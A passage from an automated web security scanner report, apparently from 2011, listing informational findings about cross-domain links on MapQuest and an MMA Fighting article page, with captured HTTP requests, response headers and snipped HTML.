<img src="http://o.aolcdn.com/os/mapquest/promo-images/newmq/questy_tear.png"><br />
...[SNIP]...
<br />
<a href="http://www.mapquesthelp.com/app/answers/detail/a_id/949/">More information &raquo;</a>
...[SNIP]...
<a href="/" class="logo" id="topLogo"><img class="logoImg" src="http://content.mqcdn.com/winston-release17-64/cdn/dotcom3/images/logos/logo.png" alt="MapQuest Logo" /></a>
...[SNIP]...
com/2011/05/02/mothers-day-brunch-flowers-and-other-things-to-make-her-smile/" target="_blank" onclick="m3.util.Event.publish('EventLog', {action: 'MQ10MQPromoTopRight-mothers-day-Click'});">
<img src="http://o.aolcdn.com/os/mapquest/marketing/Mothers-Day.png" style="position:absolute;left:0px;top:0px;" />
</a>
...[SNIP]...
<!-- static promo winston-mapbar-links -->
<a href="http://www.mapquesthelp.com/" target="_blank" class="link" id="fedbackLink" onclick="m3.util.Event.publish('EventLog', {action: 'Search-Bar-Help-Click'});" style="">Help</a>
...[SNIP]...
</a>
<a href="http://www.mapquestapi.com/link-to-mapquest/" target="_blank" omniture="Footer-MQLinkTo">${mqLinkTo}</a>
...[SNIP]...
<![endif]-->
<a href="http://www.facebook.com/mapquest" target="_blank" omniture="Footer-MQFacebook">${mqFacebook}</a>
<a href="http://twitter.com/mapquest" target="_blank" omniture="Footer-MQTwitter">${mqTwitter}</a>
...[SNIP]...
<td class="stacked">
<a href="http://www.aol.com" target="_blank" omniture="Footer-AOL">${AOL}</a>
<a href="http://travel.aol.com" target="_blank" omniture="Footer-Travel">${aolTravel}</a>
<a href="http://realestate.aol.com" target="_blank" omniture="Footer-RealEstate">${aolRealEstate}</a>
<a href="http://autos.aol.com" target="_blank" omniture="Footer-Cars">${aolCars}</a>
<a href="http://jobs.aol.com" target="_blank" omniture="Footer-Jobs">${aolJobs}</a>
...[SNIP]...
<td class="stacked">
<a href="http://www.moviefone.com" target="_blank" omniture="Footer-Movies">${aolMovies}</a>
<a href="http://travel.aol.com/flights" target="_blank" omniture="Footer-AirlineTickets">${aolAirlineTickets}</a>
<a href="http://www.rentedspaces.com" target="_blank" omniture="Footer-Apartments">${aolApartments}</a>
<a href="http://daol.aol.com/main" target="_blank" omniture="Footer-AOLProducts">${aolAllProducts}</a>
...[SNIP]...
<td class="stacked">
<a href="http://privacy.aol.com" target="_blank" omniture="Footer-PrivacyPolicy">${legalUpdatedPrivacyPolicy}</a>
...[SNIP]...
</a>
<a href="http://adinfo.aol.com/about-our-ads/" target="_blank" omniture="Footer-AboutOurAds">${legalAboutOurAds}</a>
...[SNIP]...
</script>
   <script src="http://o.aolcdn.com/omniunih.js"></script>
...[SNIP]...

16.94. http://www.mapquest.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mapquest.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.mapquest.com/?ncid=txtlnkmqmq00000001
The response contains the following links to other domains:

Request

GET /?ncid=txtlnkmqmq00000001 HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: t_Id=ZGVmYXVsdDpudWxs; Path=/
Set-Cookie: tsession="PpBmGmuR4mRIyqziAQ2PxT1oEdE="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:03 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:03 GMT; Path=/
Set-Cookie: psession="B2III+t4bMnXkU9N54bv280ThuY="; Version=1; Domain=mapquest.com; Max-Age=7776000; Expires=Wed, 03-Aug-2011 00:57:03 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:03 GMT; Path=/
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Thu, 05 May 2011 00:57:02 GMT
Content-Length: 32047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en" xml:lang="en" c
...[SNIP]...
<meta property="fb:app_id" content="324090988325" />
   <link rel="SHORTCUT ICON" href="http://content.mqcdn.com/winston-release17-64/cdn/dotcom3/images/logos/favicon.ico"/>

<link rel="image_src" href="http://content.mqcdn.com/winston-release17-64/cdn/dotcom3/images/page_link_image.gif">

<!-- MAIN JS -->
...[SNIP]...
</script>

<script src="http://sns-static.aolcdn.com/openauth/aolauth.min.js"></script>
   <script type="text/javascript" src="http://content.mqcdn.com/winston-release17-64/cdn/toolkit/lite/mqa.toolkit.js.pre$profile=winston" ></script>
...[SNIP]...
<meta name="ROBOTS" content="NOODP,NOYDIR"/>

   <link href="http://content.mqcdn.com/winston-release17-64/cdn/loader.css.pre$locale=en_US&profile=winston" media="screen, projection, print" rel="stylesheet" type="text/css" />
   <link href="http://content.mqcdn.com/winston-release17-64/cdn/loader.css.pre$locale=en_US&profile=winston-fileprint" media="print" rel="stylesheet" type="text/css" />

   <script type="text/javascript" src="http://content.mqcdn.com/winston-release17-64/cdn/loader.js.pre$locale=en_US&profile=winston" ></script>
...[SNIP]...
<link rel="canonical" />

<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
<div id="noscript">
<img src="http://o.aolcdn.com/os/mapquest/promo-images/newmq/questy_tear.png"><br />
...[SNIP]...
<br />
<a href="http://www.mapquesthelp.com/app/answers/detail/a_id/949/">More information &raquo;</a>
...[SNIP]...
<a href="/" class="logo" id="topLogo"><img class="logoImg" src="http://content.mqcdn.com/winston-release17-64/cdn/dotcom3/images/logos/logo.png" alt="MapQuest Logo" /></a>
...[SNIP]...
<a href="http://features.mapquest.com/toolbar/?ncid=bannadmqmq00000058" target="_blank" onclick="m3.util.Event.publish('EventLog', {action: 'MQ10MQPromoTopRight-Toolbar_1-Ad-Click'});">
<img src="http://o.aolcdn.com/os/mapquest/promo-images/newmq/mq_toolbar_1.jpg" style="position:absolute;left:0px;top:0px;" />
</a>
...[SNIP]...
<!-- static promo winston-mapbar-links -->
<a href="http://www.mapquesthelp.com/" target="_blank" class="link" id="fedbackLink" onclick="m3.util.Event.publish('EventLog', {action: 'Search-Bar-Help-Click'});" style="">Help</a>
...[SNIP]...
</a>
<a href="http://www.mapquestapi.com/link-to-mapquest/" target="_blank" omniture="Footer-MQLinkTo">${mqLinkTo}</a>
...[SNIP]...
<![endif]-->
<a href="http://www.facebook.com/mapquest" target="_blank" omniture="Footer-MQFacebook">${mqFacebook}</a>
<a href="http://twitter.com/mapquest" target="_blank" omniture="Footer-MQTwitter">${mqTwitter}</a>
...[SNIP]...
<td class="stacked">
<a href="http://www.aol.com" target="_blank" omniture="Footer-AOL">${AOL}</a>
<a href="http://travel.aol.com" target="_blank" omniture="Footer-Travel">${aolTravel}</a>
<a href="http://realestate.aol.com" target="_blank" omniture="Footer-RealEstate">${aolRealEstate}</a>
<a href="http://autos.aol.com" target="_blank" omniture="Footer-Cars">${aolCars}</a>
<a href="http://jobs.aol.com" target="_blank" omniture="Footer-Jobs">${aolJobs}</a>
...[SNIP]...
<td class="stacked">
<a href="http://www.moviefone.com" target="_blank" omniture="Footer-Movies">${aolMovies}</a>
<a href="http://travel.aol.com/flights" target="_blank" omniture="Footer-AirlineTickets">${aolAirlineTickets}</a>
<a href="http://www.rentedspaces.com" target="_blank" omniture="Footer-Apartments">${aolApartments}</a>
<a href="http://daol.aol.com/main" target="_blank" omniture="Footer-AOLProducts">${aolAllProducts}</a>
...[SNIP]...
<td class="stacked">
<a href="http://privacy.aol.com" target="_blank" omniture="Footer-PrivacyPolicy">${legalUpdatedPrivacyPolicy}</a>
...[SNIP]...
</a>
<a href="http://adinfo.aol.com/about-our-ads/" target="_blank" omniture="Footer-AboutOurAds">${legalAboutOurAds}</a>
...[SNIP]...
</script>
   <script src="http://o.aolcdn.com/omniunih.js"></script>
...[SNIP]...

16.95. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mmafighting.com
Path:   /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545
The response contains the following links to other domains:

Request

GET /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545 HTTP/1.1
Host: www.mmafighting.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:18 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 01:57:18 GMT; path=/
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 00:57:17 GMT; path=/
Content-Type: text/html
Content-Length: 63415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:image" content="http://www.blogcdn.com/www.mmafighting.com/media/2011/05/brashearmmahockey.43f84ecc70004860a601a941ca808f05_thumbnail.jpg" />
<link rel="image_src" href="http://www.blogcdn.com/www.mmafighting.com/media/2011/05/brashearmmahockey.43f84ecc70004860a601a941ca808f05_thumbnail.jpg" />
   <link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://mmafighting.com/rss.xml" />
...[SNIP]...
<!-- FanHouse assets -->
<script src="http://o.aolcdn.com/os_merge/?file=/aol/jquery-1.4.4.min.js&file=/aol/jquery.getjs-1.0.min.js&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.sonar.min.js&file=/aol/jquery.addthis.min.js&file=/aol/jquery.aolphotogallery-1.0.min.js" type="text/javascript"></script>

<script type="text/javascript" src="http://o.aolcdn.com/art/merge/?f=/fanhouse/design/v2/scripts/origin/jquery-cookie.min.js&f=/fanhouse/design/v2/scripts/origin/common.min.js&f=/fanhouse/design/v2/scripts/origin/common_orig.min.js"></script>

<link rel="stylesheet" type="text/css" href="http://o.aolcdn.com/art/fanhouse/design/v2/css/jcar/scoreboard/skin.css?v=1.2" />

<script type="text/javascript" src="http://o.aolcdn.com/art/feedback/feedback1.js"></script>


<!-- FanHouse assets -->
<script type="text/javascript" src="http://o.aolcdn.com/art/merge/?f=/fanhouse/design/v2/scripts/origin/pagination.js&f=/fanhouse/design/v2/scripts/origin/pagination-lineup.js&f=/fanhouse/design/v2/scripts/origin/jquery-cycle.js&f=/fanhouse/design/v2/scripts/origin/openauthclient.js&f=/fanhouse/design/v2/scripts/origin/blogs.js&f=/fanhouse/design/v2/scripts/origin/jsoncomments.js"></script>
<link rel="shortcut icon" href="http://www.blogsmithmedia.com/www.mmafighting.com/media/favicon.ico" type="image/x-icon" />


<!-- Ads -->
...[SNIP]...
</script>
<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
<!-- jQuery assets -->
<link rel="stylesheet" type="text/css" href="http://o.aolcdn.com/art/fanhouse/design/v2/scripts/jcarousel/lib/jquery.jcarousel.css" />
<link rel="stylesheet" type="text/css" href="http://o.aolcdn.com/art/fanhouse/design/v2/css/jcar/lineup/skin.css?v=1.4" />


<!-- Articles assets -->
<link media="screen" type="text/css" rel="stylesheet" href="http://o.aolcdn.com/art/ch_fanhouse/articles/css/articlev15a.css" />
<link media="screen" type="text/css" rel="stylesheet" href="http://o.aolcdn.com/art/ch_fanhouse/articles/css/spherev13.css" />
<link media="screen" type="text/css" rel="stylesheet" href="http://o.aolcdn.com/art/dynaboards/cmnty_comments.v1.1.4.css" />
<link media="screen" type="text/css" rel="stylesheet" href="http://o.aolcdn.com/art/ch_sports/cmnty_rating.dev.v1.0.css" />
<link media="screen" type="text/css" rel="stylesheet" href="http://o.aolcdn.com/art/ch_fanhouse/articles/css/communitycommentoverwritev27.css" />

<script type="text/javascript" src="http://o.aolcdn.com/feedback/feedback1.js"></script>

<!-- MMA Fighting assets -->
<script type="text/javascript" src="http://www.aolcdn.com/fanhouse/mmafighting/mmafighting.js"></script>
<link rel="stylesheet" type="text/css" media="screen" href="http://o.aolcdn.com/os/fanhouse/design/v2/css/fanhouse.css?version=172" />
<link rel="stylesheet" type="text/css" media="screen" href="http://o.aolcdn.com/os/fanhouse/design/MMAFighting/css/mma_fighting.css" />
<style type="text/css">
...[SNIP]...
</script>
<script language="JavaScript" src="http://o.aolcdn.com/omniunih.js"></script>
...[SNIP]...
<li class="aolLnk"><a href="http://www.aol.com/" title="Aol."><img src="http://www.aolcdn.com/fanhouse/mmafighting/mma_aolhatlogo.gif" alt="Aol." width="32" height="12"></a></li>
               <li><a href="http://mail.aol.com" title="Mail">MAIL</a></li>
               <li class="lstLI">You might also like <a href="http://aol.sportingnews.com" title="Fleaflicker">Sporting News</a>
...[SNIP]...
<a href="#main"><img src="http://www.aolcdn.com/ch_global/blank.gif" width="1" height="1" border="0" alt="Skip to Main Content"></a>
...[SNIP]...
<li><a href="http://www.mmawarehouse.com/?bid=2&aid=CD2&opt=" target="_blank" title="Store">Store</a>
...[SNIP]...
<li class="forumslink"><a onclick = "return fBo('mmafighting');" href="http://feedback.aol.com/rs/rs.php?sid=mmafighting" target="feedback">Send Us Feedback</a>
...[SNIP]...
<div class="entry-content" id="19931900">
<img vspace="4" hspace="4" border="1" align="right" alt="" src="http://www.blogcdn.com/www.mmafighting.com/media/2011/05/brashearmmahockey.43f84ecc70004860a601a941ca808f05.jpg" />Donald Brashear will make his MMA debut on June 4 against a relatively unknown heavyweight.<br />
...[SNIP]...
<br />
According to <a target="_blank" href="http://twitter.com/#!/NicLandryRDS">Nic Landry of RDS</a>
...[SNIP]...
<a target="_blank"
href=""http://www.mmawarehouse.com/Affliction-Georges-St-Pierre-GSP-Icon-UFC-129-Reve-p/aff-1404.htm?bid=2&aid=CD2&opt=" target="_blank">
<img src="http://www.blogcdn.com/www.mmafighting.com/media/2011/04/gsp13.jpg">
</div>
...[SNIP]...
<li class="first"><a href="http://www.mmawarehouse.com/Affliction-Georges-St-Pierre-GSP-Icon-UFC-129-Reve-p/aff-1404.htm?bid=2&aid=CD2&opt=" target="_blank">GSP UFC 129 Walkout Tee</a>
...[SNIP]...
<li><a href="http://www.mmawarehouse.com/Under-Armour-Georges-St-Pierre-GSP-Explosive-Bi-p/uax-1052.htm?bid=2&aid=CD2&opt=" target="_blank">Under Armour GSP Explosive T-Shirt</a>
...[SNIP]...
<li><a href="http://www.mmawarehouse.com/FDM-Jake-Shields-T-Shirt-p/fdm-1009.htm?bid=2&aid=CD2&opt=" target="_blank">FDM Jake Shields T-Shirt</a>
...[SNIP]...
<li><a href="http://www.mmawarehouse.com/Xtreme-Couture-Randy-Couture-UFC-129-Walkout-Tee-p/xtc-1020.htm?bid=2&aid=CD2&opt=" target="_blank">Randy Couture UFC 129 Walkout Tee</a>
...[SNIP]...
<li><a href="http://www.mmawarehouse.com/Dethrone-Jose-Aldo-Signature-Series-Tee-Limited-E-p/det-1110.htm?bid=2&aid=CD2&opt=" target="_blank">Jose Aldo Samurai Tee (Limited Edition)</a>
...[SNIP]...
<li><a href="http://www.mmawarehouse.com/Dethrone-Jose-Aldo-Signature-Series-Tee-p/det-1039.htm?bid=2&aid=CD2&opt=" target="_blank">Dethrone Jose Aldo Signature Tee</a>
...[SNIP]...
<li><a href="http://www.mmawarehouse.com/FORM-Athletics-Jon-Bones-Jones-UFC-128-Walkout-T-S-p/frm-1070.htm?bid=2&aid=CD2&opt=" target="_blank">Jones UFC 128 Walkout T-Shirt</a>
...[SNIP]...
<div class="votes">
<img src="http://www.aolcdn.com/fanhouse/design/v2/images/rate1.gif" alt="1 star" /> <span class="tools" id="tools_33956960">
...[SNIP]...
<a href="#" class="voteLink" id="vd33956960" onclick="voteComment('33956960','down'); return false;" title="Vote This Comment Down"><img id="vote_down" src="http://o.aolcdn.com/art/fanhouse/design/v2/images/cmnt-thumb-dn.gif" alt="vote down" /></a><a href="#" class="voteLink" id="vu33956960" onclick="voteComment('33956960','up'); return false;" title="Vote This Comment Up"><img id="vote_up" src="http://o.aolcdn.com/art/fanhouse/design/v2/images/cmnt-thumb-up.gif" alt="vote up" /></a> <a href="#" class="reportLink" id="r33956960" onclick="reportComment(33956960); return false" title="Report This Comment"><img src="http://o.aolcdn.com/art/fanhouse/design/v2/images/cmnt-report.gif" alt="Report" /></a>
...[SNIP]...
<div class="votes">
<img src="http://www.aolcdn.com/fanhouse/design/v2/images/rate3.gif" alt="3 stars" /> <span class="tools" id="tools_33957361">
...[SNIP]...
<a href="#" class="voteLink" id="vd33957361" onclick="voteComment('33957361','down'); return false;" title="Vote This Comment Down"><img id="vote_down" src="http://o.aolcdn.com/art/fanhouse/design/v2/images/cmnt-thumb-dn.gif" alt="vote down" /></a><a href="#" class="voteLink" id="vu33957361" onclick="voteComment('33957361','up'); return false;" title="Vote This Comment Up"><img id="vote_up" src="http://o.aolcdn.com/art/fanhouse/design/v2/images/cmnt-thumb-up.gif" alt="vote up" /></a> <a href="#" class="reportLink" id="r33957361" onclick="reportComment(33957361); return false" title="Report This Comment"><img src="http://o.aolcdn.com/art/fanhouse/design/v2/images/cmnt-report.gif" alt="Report" /></a>
...[SNIP]...
<div class="votes">
<img src="http://www.aolcdn.com/fanhouse/design/v2/images/rate3.gif" alt="3 stars" /> <span class="tools" id="tools_33959163">
...[SNIP]...
<a href="#" class="voteLink" id="vd33959163" onclick="voteComment('33959163','down'); return false;" title="Vote This Comment Down"><img id="vote_down" src="http://o.aolcdn.com/art/fanhouse/design/v2/images/cmnt-thumb-dn.gif" alt="vote down" /></a><a href="#" class="voteLink" id="vu33959163" onclick="voteComment('33959163','up'); return false;" title="Vote This Comment Up"><img id="vote_up" src="http://o.aolcdn.com/art/fanhouse/design/v2/images/cmnt-thumb-up.gif" alt="vote up" /></a> <a href="#" class="reportLink" id="r33959163" onclick="reportComment(33959163); return false" title="Report This Comment"><img src="http://o.aolcdn.com/art/fanhouse/design/v2/images/cmnt-report.gif" alt="Report" /></a>
...[SNIP]...
<div class="votes">
<img src="http://www.aolcdn.com/fanhouse/design/v2/images/rate3.gif" alt="3 stars" /> <span class="tools" id="tools_33958137">
...[SNIP]...
<a href="#" class="voteLink" id="vd33958137" onclick="voteComment('33958137','down'); return false;" title="Vote This Comment Down"><img id="vote_down" src="http://o.aolcdn.com/art/fanhouse/design/v2/images/cmnt-thumb-dn.gif" alt="vote down" /></a><a href="#" class="voteLink" id="vu33958137" onclick="voteComment('33958137','up'); return false;" title="Vote This Comment Up"><img id="vote_up" src="http://o.aolcdn.com/art/fanhouse/design/v2/images/cmnt-thumb-up.gif" alt="vote up" /></a> <a href="#" class="reportLink" id="r33958137" onclick="reportComment(33958137); return false" title="Report This Comment"><img src="http://o.aolcdn.com/art/fanhouse/design/v2/images/cmnt-report.gif" alt="Report" /></a>
...[SNIP]...
<div class="votes">
<img src="http://www.aolcdn.com/fanhouse/design/v2/images/rate3.gif" alt="3 stars" /> <span class="tools" id="tools_33959114">
...[SNIP]...
<a href="#" class="voteLink" id="vd33959114" onclick="voteComment('33959114','down'); return false;" title="Vote This Comment Down"><img id="vote_down" src="http://o.aolcdn.com/art/fanhouse/design/v2/images/cmnt-thumb-dn.gif" alt="vote down" /></a><a href="#" class="voteLink" id="vu33959114" onclick="voteComment('33959114','up'); return false;" title="Vote This Comment Up"><img id="vote_up" src="http://o.aolcdn.com/art/fanhouse/design/v2/images/cmnt-thumb-up.gif" alt="vote up" /></a> <a href="#" class="reportLink" id="r33959114" onclick="reportComment(33959114); return false" title="Report This Comment"><img src="http://o.aolcdn.com/art/fanhouse/design/v2/images/cmnt-report.gif" alt="Report" /></a>
...[SNIP]...
</div>

<script type="text/javascript" src="http://www.blogcdn.com/js/ajax_c.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.weblogsinc.com/b-c/sns.js"></script>
...[SNIP]...
<li><a href="http://twitter.com/mmafighting" title="Twitter" class="twttr">twitter</a></li>
       <li><a href="http://www.facebook.com/mmafighting" title="Facebook" class="fcbk">facebook</a>
...[SNIP]...
</h2>
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<a href="http://www.mmafighting.com/photos/ufc-129-pictures-photos/" title="UFC 129 Pictures"><img src="http://www.blogcdn.com/www.mmafighting.com/media/2011/05/gspvsshieldsphotos132.jpg" alt="UFC 129 Pictures" /><div class="altCntnr">
...[SNIP]...
<a href="http://www.mmafighting.com/photos/yamato-damashii-pictures/" title="Japan Journey Pictures"><img src="http://www.blogcdn.com/www.mmafighting.com/media/2011/04/yamatodamashiidiaries87-1302894424.jpg" alt="Japan Journey Pictures" /><div class="altCntnr">
...[SNIP]...
<a href="http://www.mmafighting.com/photos/strikeforce-diaz-vs-daley-pictures" title="Strikeforce Pictures"><img src="http://www.blogcdn.com/www.mmafighting.com/media/2011/04/diazvsdaley13287.jpg" alt="Strikeforce Pictures" /><div class="altCntnr">
...[SNIP]...
<a href="http://www.mmafighting.com/photos/ufc-128-pictures-photos/" title="UFC 128 Pictures"><img src="http://www.blogcdn.com/www.mmafighting.com/media/2011/03/jonsovershogun132.jpg" alt="UFC 128 Pictures" /><div class="altCntnr">
...[SNIP]...
<a href="http://www.mmafighting.com/photos/ufc-127-pictures-photos" title="UFC 127 Photos"><img src="http://www.blogcdn.com/www.mmafighting.com/media/2011/02/pennvsfitch132-1298790818.jpg" alt="UFC 127 Photos" /><div class="altCntnr">
...[SNIP]...
<a href="http://www.mmafighting.com/photos/ufc-octagon-girls-australia-pictures" title="UFC Octagon Girl Photos"><img src="http://www.blogcdn.com/www.mmafighting.com/media/2011/02/ariannyceleste132.jpg" alt="UFC Octagon Girl Photos" /><div class="altCntnr">
...[SNIP]...
<div style="padding:7px 7px 11px;"><a href="http://www.mmawarehouse.com/?bid=2&aid=CD2&opt=" target="_blank"><img src="http://www.blogcdn.com/www.mmafighting.com/media/2011/02/mmawarehouse4.jpg" width="300px" height="250px" border="0" alt="MMA Clothing and More"/></a>
...[SNIP]...
</h2>
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</object>
<a href="https://www.fightmagazine.com/mma-magazine/subscribe.asp?trackcode=AOL2011" target="_new" title="All Videos" class="AllVds">Get $5 off Fight Magazine subscription ..</a>
...[SNIP]...
</h2>
<a href="http://www.sportingnews.com/rss" title="Sporting News RSS Feed" class="fnhsFeed"><img src="http://o.aolcdn.com/art/ch_fanhouse/images/modules/ftrd_wrtrs/rss_feed.gif" alt="Sporting News RSS Feed" /></a>
<ul><li><a href="http://aol.sportingnews.com/nba/story/2011-05-03/nba-playoff-preview-mavericks-at-lakers-game-2" title="NBA playoff preview: Mavericks at Lakers, Game 2">NBA playoff preview: Mavericks at Lakers, Game 2</a>
...[SNIP]...
<li><a href="http://aol.sportingnews.com/nfl/story/2011-05-04/rashard-mendenhall-turns-to-blog-to-clarify-controversial-tweets" title="Rashard Mendenhall turns to blog to clarify controversial tweets">Rashard Mendenhall turns to blog to clarify controversial tweets</a>
...[SNIP]...
<li><a href="http://aol.sportingnews.com/nhl/story/2011-05-04/three-games-thre-major-issues-in-stanley-cup-playoffs" title="Three games, three major issues in Stanley Cup playoffs">Three games, three major issues in Stanley Cup playoffs</a>
...[SNIP]...
<li><a href="http://aol.sportingnews.com/nba/story/2011-05-03/sporting-news-player-of-the-year-derrick-rose" title="Player of the Year: Derrick Rose">Player of the Year: Derrick Rose</a>
...[SNIP]...
<li><a href="http://aol.sportingnews.com/nfl/story/2011-05-04/five-playoff-teams-still-have-big-need-to-fill" title="Five playoff teams still have big need to fill">Five playoff teams still have big need to fill</a>
...[SNIP]...
</ul>
<a href="http://aol.sportingnews.com/" title="View All Sporting Headlines" class="allHdlns">View All <span class="arrws">
...[SNIP]...
</h2>
<a href="http://rss.cnn.com/rss/si_mma.rss" title="Sports Illustrated MMA & Boxing RSS Feed" class="fnhsFeed"><img src="http://o.aolcdn.com/art/ch_fanhouse/images/modules/ftrd_wrtrs/rss_feed.gif" alt="Sports Illustrated MMA & Boxing RSS Feed" /></a>
<ul><li><a href="http://sportsillustrated.cnn.com/2011/writers/bryan_armen_graham/05/03/manny.pacquiao.shane.mosley.preview/index.html?xid=si_mma" title="Bryan Armen Graham: Crash Course: Manny Pacquiao vs. Shane Mosley">Bryan Armen Graham: Crash Course: Manny Pacquiao vs. Shane Mosley</a>
...[SNIP]...
<li><a href="http://sportsillustrated.cnn.com/2011/mma/boxing/05/04/pacquiao.mosley.ap/index.html?xid=si_mma" title="Pacquiao, Mosley ready for welterweight showdown">Pacquiao, Mosley ready for welterweight showdown</a>
...[SNIP]...
<li><a href="http://sportsillustrated.cnn.com/2011/writers/jeff_wagenheim/05/03/may.rankings/index.html?xid=si_mma" title="Jeff Wagenheim: Georges St-Pierre remains atop SI.com's May pound-for-pound ratings">Jeff Wagenheim: Georges St-Pierre remains atop SI.com's May pound-for-pound ratings</a>
...[SNIP]...
<li><a href="http://sportsillustrated.cnn.com/2011/mma/boxing/05/04/alvarez.rhodes.ap/index.html?xid=si_mma" title="Alvarez to defend title against Rhodes on June 18">Alvarez to defend title against Rhodes on June 18</a>
...[SNIP]...
</ul>
<a href="http://sportsillustrated.cnn.com/mma/" title="View All Sports Illustrated's MMA & Boxing Headlines" class="allHdlns">View All <span class="arrws">
...[SNIP]...
<li><a href="http://allelbows.com/" title="All Elbows">All Elbows</a></li><li><a href="http://www.bloodyelbow.com/" title="Bloody Elbow">Bloody Elbow</a>
...[SNIP]...
<li><a href="http://www.cagepotato.com/" title="Cage Potato">Cage Potato</a>
...[SNIP]...
<li><a href="http://www.fightlinker.com/" title="FightLinker">FightLinker</a>
...[SNIP]...
<li><a href="http://fightmetric.com/" title="FightMetric">FightMetric</a>
...[SNIP]...
<li><a href="http://www.lowkick.com/MMA" title="Low Kick">Low Kick</a></li><li><a href="http://middleeasy.com/" title="Middle Easy">Middle Easy</a>
...[SNIP]...
<li><a href="http://www.prommanow.com" title="Pro MMA Now">Pro MMA Now</a>
...[SNIP]...
<li><a href="http://www.ultimatefighter.com/" title="UltimateFighter.com">UltimateFighter.com</a>
...[SNIP]...
<div id="ftr">
                                   <a href="http://www.fanhouse.com/" title="MMA Fighting"><div id="chLogo" class="clrFx">
...[SNIP]...
<li><a href="http://www.mmawarehouse.com/">MMA Clothing</a>
...[SNIP]...
<li><a href="http://www.mmawarehouse.com/">MMA Gear</a></li>

<li><a href="http://www.mmawarehouse.com/">MMA Shorts</a>
...[SNIP]...
<li><a href="http://www.mmawarehouse.com/">MMA Gloves</a>
...[SNIP]...
<li><a href="http://www.mmawarehouse.com/">MMA Shirts</a>
...[SNIP]...
<li><a href="http://superbowlads.fanhouse.com">Super Bowl Ads</a>
...[SNIP]...
<li><a href="http://superbowlads.fanhouse.com">Super Bowl Commercials</a>
...[SNIP]...
<li><a href="http://realestate.aol.com/blog/2011/01/14/texas-super-bowl-rentals-royal-rip-off/">Super Bowl Rentals</a>
...[SNIP]...
<li><a href="http://www.tuaw.com/2011/02/04/planning-a-super-bowl-party-check-out-these-apps/">Super Bowl Trivia</a>
...[SNIP]...
<li><a href="http://www.tvsquad.com/2011/02/02/behind-the-scenes-at-puppy-bowl-vii/">Puppy Bowl</a>
...[SNIP]...
<li><a href="http://www.dailyfinance.com">Finance</a></li>

<li><a href="http://www.walletpop.com/blog/category/celebs-and-money/">Celebrity Money</a>
...[SNIP]...
<li><a href="http://smallbusiness.aol.com/">Small Business News</a>
...[SNIP]...
<li><a href="http://sports.cms.aol.com/dynapubcms/v3/#ww.bloggingstocks.com/">Stock News</a>
...[SNIP]...
<li><a href="http://www.gamedaily.com/">GameDaily</a>
...[SNIP]...
<li><a href="http://www.gnn.com/">Good News Now</a>
...[SNIP]...
<li><a href="http://www.luxist.com/">Luxist</a>
...[SNIP]...
<li><a href="http://about.aol.com/aolnetwork/mem_tos">Terms of Use</a>
...[SNIP]...
<li><a href="http://about.aol.com/aolnetwork/aol_pp">Privacy Policy</a>
...[SNIP]...
<li><a href="http://about.aol.com/aolnetwork/trademarks">Trademarks</a>
...[SNIP]...
<li><a href="http://help.aol.com">AOL A-Z HELP</a>
...[SNIP]...
